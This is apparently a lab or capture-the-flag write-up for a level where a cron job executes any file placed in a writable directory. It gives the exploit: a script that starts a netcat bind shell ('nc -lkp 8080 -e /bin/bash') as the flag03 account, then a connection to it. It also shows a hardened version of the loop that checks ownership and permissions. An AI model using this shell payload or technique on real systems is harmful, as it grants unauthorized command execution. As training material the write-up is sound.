About - Vulnerable Cron Job
Check the home directory of flag03 and take note of the files there.
There is a crontab that is called every couple of minutes.
To do this level, log in as the level03 account with the password
level03. Files for this level can be found in /home/flag03.
There is no source code available for this level.
Solution
Looking at the code,
for i in /home/flag03/writable.d/*; do
(ulimit -t 5; bash -x $i)
rm -f "$i"
done
note that there is no validation of files beyond checking that a file exists. Create a static nc
listener to provide a shell. On this system, put the following two lines in a file:
/bin/bash
nc.traditional -lkp 8080 -e "/bin/bash"
Use chmod +x <file name> to make the file executable, and then copy it to /home/flag03/writable.d/.
Connect to the shell with nc 127.0.0.1 8080 after a few minutes.
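
A hardened form of the loop shown above, as an added example (not part of the original write-up or the level's files): it refuses to process a drop directory that other accounts can write to, and skips any file not owned by the account running the job. The function names `is_trusted` and `run_dropdir` are hypothetical, and GNU `stat` is assumed.

```shell
#!/bin/bash
# Added example: hardened version of the drop-directory loop.
# is_trusted and run_dropdir are hypothetical names, not from the level.

# Succeeds only if $1 is owned by the current user and has no
# group/other write bits (GNU stat assumed).
is_trusted() {
    local owner mode
    owner=$(stat -c '%u' -- "$1") || return 1
    mode=$(stat -c '%a' -- "$1") || return 1
    [ "$owner" -eq "$(id -u)" ] || return 1
    [ $(( 0$mode & 022 )) -eq 0 ]
}

# Runs the scripts in directory $1, skipping anything another account
# could have created or modified. Prints one line per decision.
run_dropdir() {
    local dir=$1 f
    if ! is_trusted "$dir"; then
        echo "refuse: $dir is owned or writable by another account"
        return 1
    fi
    for f in "$dir"/*; do
        # Plain files only: no symlinks, directories or devices.
        if [ -L "$f" ] || [ ! -f "$f" ]; then
            continue
        fi
        if is_trusted "$f"; then
            echo "run: $f"
            (ulimit -t 5; bash -- "$f")
        else
            echo "skip: $f"
        fi
    done
    return 0
}
```

The directory check is the one that matters: once only the job's own account can write to the directory, the per-file check is defence in depth.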